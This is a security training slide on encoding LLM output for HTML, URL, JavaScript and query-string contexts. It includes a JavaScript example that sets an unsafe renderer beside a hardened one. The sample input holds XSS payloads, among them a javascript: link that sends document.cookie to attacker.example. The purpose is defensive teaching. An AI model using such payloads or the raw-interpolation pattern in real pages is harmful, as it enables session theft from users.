Slide 20 of 27 · Part 4 · Prevention · Mitigation 2 of 7
Encode output for the context where it lands.
📄 OWASP LLM Top 10:2025 · LLM05 Prevention — Output Encoding
M2 — Context-Aware Output Encoding
Encode LLM Output for HTML, URL, JavaScript, and Other Contexts

“Implement proper output encoding when data is returned to users, especially when passing data to interpreters.” Encoding must match the context the output lands in: HTML entity encoding for text and attribute values on a web page, percent-encoding for URL query-string components, and JavaScript string escaping for inline scripts (which should be avoided where possible). Applying the wrong encoder for the context, or encoding once for several contexts, leaves the injection open.

The ChatGPT plugin XSS (Imperva, 2023) succeeded because LLM output was inserted into the DOM without HTML encoding. The fix was straightforward — use textContent instead of innerHTML, or run output through a sanitizer like DOMPurify — but it wasn’t in place at launch. One missing encode() call was the entire attack surface.

HTML text and attribute values: escape &, <, >, ", ' before inserting into the DOM, and always quote attribute values so the escaping holds
DOM: use element.textContent (or createTextNode) not innerHTML for LLM text
Rich HTML allowed: run output through DOMPurify or an equivalent allowlist sanitizer; escaping would display the markup rather than render it
Server-side: use your framework’s auto-escape (Jinja2 with autoescape enabled, React JSX, etc.); note that a bare Jinja2 Environment has autoescape off by default, so set autoescape=True or select_autoescape()
URL context: parse the URL and allowlist http and https; reject javascript:, data:, and vbscript: schemes, then HTML-encode the result before it goes into an href attribute
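As an added example (not code from the slide or from the Imperva write-up), one encoder per output context, applied to a constructed LLM response, with the raw-interpolation pattern beside its hardened form. The sample LLM_OUTPUT and the function names (renderMessage, safeHttpUrl, and so on) are made up for illustration; the block builds strings only, so it runs under plain Node.js with no DOM.

```javascript
// Added example: context-aware encoding of LLM output. Not the slide's code.

// Constructed sample of what a prompt-injected model might emit.
const LLM_OUTPUT = {
  text: 'Result: <img src=x onerror="alert(document.cookie)"> & "done"',
  link: 'javascript:fetch("https://attacker.example/?c=" + document.cookie)',
  label: 'O\'Reilly "quoted" <b>bold</b>',
};

// HTML text and double-quoted attribute context: escape the five characters
// the HTML parser acts on. Only valid for attributes you always wrap in "".
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

// JavaScript string-literal context (inline <script>), for the cases you
// cannot avoid: \uXXXX-escape everything but [A-Za-z0-9], so "</script>",
// quotes and newlines can no longer terminate the literal or the script tag.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// URL context: parse with the WHATWG URL parser and allow only http(s).
// javascript:, data:, vbscript: and unparseable strings all return null.
function safeHttpUrl(s) {
  let u;
  try { u = new URL(String(s)); } catch { return null; }
  return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : null;
}

// Query-string context: percent-encode each component, never the whole URL.
function queryParam(name, value) {
  return `${encodeURIComponent(name)}=${encodeURIComponent(value)}`;
}

// The "before": raw interpolation, the pattern behind the plugin XSS.
function renderMessageUnsafe(out) {
  return `<p>${out.text}</p><a href="${out.link}">${out.label}</a>`;
}

// The "after": every interpolation goes through the encoder for the context
// it lands in, and an unsafe link is demoted to plain text rather than rendered.
function renderMessage(out) {
  const href = safeHttpUrl(out.link);
  const link = href
    ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(out.label)}</a>`
    : `<span class="blocked-link">${escapeHtml(out.label)}</span>`;
  return `<p>${escapeHtml(out.text)}</p>${link}`;
}

// In the browser, prefer the DOM API over string building for plain text:
//   el.textContent = out.text;   // never el.innerHTML = out.text
// and use the string renderer above only where markup is genuinely required.

console.log('UNSAFE:', renderMessageUnsafe(LLM_OUTPUT));
console.log('SAFE:  ', renderMessage(LLM_OUTPUT));
console.log('JS:    ', escapeJsString('</script><script>alert(1)</script>'));
console.log('QUERY: ', queryParam('q', LLM_OUTPUT.text));
```

The point of the split encoders is that each one is only correct for its own sink: escapeHtml does nothing against javascript: in an href, and safeHttpUrl does nothing against < in a text node, so renderMessage has to apply both on the link path.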

Grep your codebase for innerHTML, outerHTML, insertAdjacentHTML, document.write, dangerouslySetInnerHTML, v-html, and the Jinja2 | safe filter and Markup() wrapper. Any of these applied to LLM output, directly or through an intermediate variable, is a candidate vulnerability until you can show a sanitizer sits between the model and the sink.

Next → M3: Parameterized queries